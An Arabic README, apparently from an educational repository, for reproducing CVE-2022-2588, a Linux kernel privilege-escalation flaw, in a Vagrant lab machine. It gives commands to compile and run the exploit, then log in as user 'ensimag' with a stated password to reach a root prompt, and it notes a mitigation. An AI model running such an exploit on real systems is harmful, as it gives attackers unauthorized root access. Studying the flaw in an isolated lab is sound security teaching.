
استغلال تعليمي لـ CVE-2022-2588، وهي حالة سباق في نواة Linux تؤدي إلى تصعيد الامتيازات. يتضمن إعداد Vagrant لجهاز ضعيف وتعليمات لتجميع وتشغيل الاستغلال.
الكود مُعدَّل ليعمل على معالج واحد، مع توفير ملف Vagrant لتشغيل جهاز ضعيف يُستخدم لأغراض تعليمية.
لإنشاء جهاز ضعيف، يجب أن يكون Vagrant مثبتاً على جهازك، ثم نفّذ في جذر المستودع:
Vagrant up
انتظر حتى الانتهاء من التثبيت والإقلاع ثم:
Vagrant ssh
داخل الجهاز الافتراضي:
cd CVE-2022-2588/ && gcc ./exploit.c -o exploit -lpthread
./exploit
ثم:
su ensimag
password: #ensimag
#
الكود الأصلي للاستغلال: هنا
لمنع الاستغلال، حاول إلغاء تعليق السطرين 15 و18 وأعد تشغيل العملية.